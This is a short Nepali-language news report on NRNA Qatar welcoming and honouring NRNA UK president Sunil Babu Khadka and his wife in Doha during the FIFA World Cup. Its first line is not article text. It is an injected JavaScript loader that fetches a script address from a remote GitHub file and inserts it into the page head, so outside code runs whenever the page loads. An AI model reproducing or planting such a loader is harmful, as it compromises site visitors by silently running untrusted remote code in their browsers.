;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
जुनेली न्यून, बेलायत।
गैर आबासिय नेपाली संघ कतारले फिफा बिस्वकपको समय पारी कतार भ्रमणमा रहनुभएका गैर आबासिय नेपाली संघ बेलायतका अध्यक्ष सुनिल बाबु खडका र श्रीमती सुलोचना खडकालाई कतारमा स्वागत तथा सम्मान गरेको छ।गैर आबासिय नेपाली संघ कतारले आयोजना गरेको एक कार्यक्रममा यो सम्मान गरिएको हो।
मध्यपुर्वका गैर आबासिय नेपाली संघका अभियन्ताहरु उपस्थित भएको कार्यक्रममा अध्यक्ष खडका लाई खांदा ओढाई बधाई ज्ञापन गरिएको थियो। सो अबसरमा अध्यक्ष खडकाले गैर आबासिय नेपाली संघ कतार एवं मध्यपुर्वमा रहेका अन्य राष्ट्रिय समन्वय परिषद र गैर आबासिय नेपाली संघ बेलायतको सम्बन्ध संघको स्थापना कालबाटै निकै राम्रो रहेको र आगामी दिनमा पनी यसै गरी मिलेर जाने बताउनु भएको थियो।यही मौकापारी एनआरएनए मध्यपुर्वका अभियन्ताहरुले संघको आगामी नेतृत्व मध्यपुर्वले पाऊनु पर्ने र बेलायतबाट आबस्यक सहयोग गरिदिन पनी अनुरोध गरेका थिए।
कार्यक्रम गैर आबासिय नेपाली संघ कतारका अध्यक्ष मोहम्मद मुक्तदा मुसलमानको सभापतित्वमा दोहामा गरिएको थियो।
फेसबुक प्रतिक्रियाहरु